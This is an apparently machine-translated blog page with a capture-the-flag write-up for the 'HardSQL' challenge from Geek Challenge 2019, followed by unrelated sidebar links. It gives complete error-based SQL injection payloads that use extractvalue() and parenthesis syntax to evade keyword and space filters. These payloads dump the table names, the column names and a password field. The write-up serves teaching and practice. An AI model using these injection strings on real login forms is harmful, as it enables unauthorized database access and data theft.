当前位置:网站首页>[geek challenge 2019] hardsql
[geek challenge 2019] hardsql
2022-06-23 09:19:00 【K00sec】
[ Geek challenge 2019]HardSQL
Tried several common methods , Space found ,or,and,union,order by Many are filtered .

Try error reporting , If you haven't used it, you can directly check Baidu , Then use extractvalue() Function found not filtered out .


# Blow up the current database
?username=asdasdasda&password=2'-extractvalue(1,(concat(0x7e,(select(database())))))%23 # Blasting data sheet ?username=asdasdasda&password=2'-extractvalue(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where((table_schema)like('%geek%')))))%23
## '~H4rDsq1'
# Burst field
?username=asdasdasda&password=2'-extractvalue(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where((table_name)like('%H4rDsq1%')))))%23 ## '~id,username,password' # Violent left 30 The value of a ## extractvalue() Function maximum return value 32 So you need to use left() perhaps right() function , Cut from the left or right , And then splicing . ?username=asdasdasda&password=2'-extractvalue(1,(concat(0x7e,(select(left(password,31))from(H4rDsq1)))))%23
## 'flag{4e949b07-99eb-4fec-ae1b-17'
# The value on the right of the burst
?username=asdasdasda&password=2'-extractvalue(1,(concat(0x7e,(select(right(password,15))from(H4rDsq1)))))%23 ## '~b-173bd90bdf56}' # ' Final flag:flag{
4e949b07-99eb-4fec-ae1b-173bd90bdf56}'
边栏推荐
- Redis学习笔记—数据类型:哈希(hash)
- "Coach, I want to play basketball" -- AI Learning Series booklet for students who are making systems
- Jog运动模式
- Bit binding
- 自定义标签——jsp标签基础
- Mysql 数据库入门总结
- 披萨订购设计----简单工厂模式
- 36 krypton launched | cloud native database company "tuoshupai" completed a new round of strategic financing, and the valuation has reached the level of quasi Unicorn
- What is a closure function
- Redis学习笔记—redis-benchmark详解
猜你喜欢

线性表(SequenceList)的顺序表示与实现----线性结构

多线程初学
Redis learning notes - slow query analysis

自定义标签——jsp标签基础

Community article | mosn building subset optimization ideas sharing

16.系统启动流程
Redis学习笔记—发布订阅
Redis学习笔记—数据类型:哈希(hash)

swagger UI :%E2%80%8B

'coach, I want to play basketball!'—— AI Learning Series booklet for system students
随机推荐
ionic5表单输入框和单选按钮
In depth interpretation of poca smart contract platform gear: the road to parallel architecture public chain
Redis learning notes - detailed explanation of redis benchmark
线性表(SequenceList)的顺序表示与实现----线性结构
Redis learning notes - transactions
How to use "tomato working method" in flowus, notation and other note taking software?
Redis learning notes master-slave copy
Redis learning notes - geographic information location (GEO)
自定义标签——jsp标签基础
[GXYCTF2019]BabyUpload
Node request module cookie usage
Quartz Crystal Drive Level Calculation
类型从属名称的使用必须以“typename”为前缀
ionic5錶單輸入框和單選按鈕
Redis learning notes - data type: string (string)
在小程序中实现视频通话及互动直播的一种方法
Redis学习笔记—数据库管理
Redis learning notes - Database Management
全局快门和卷帘快门的区别
【NanoPi2试用体验】裸机第一步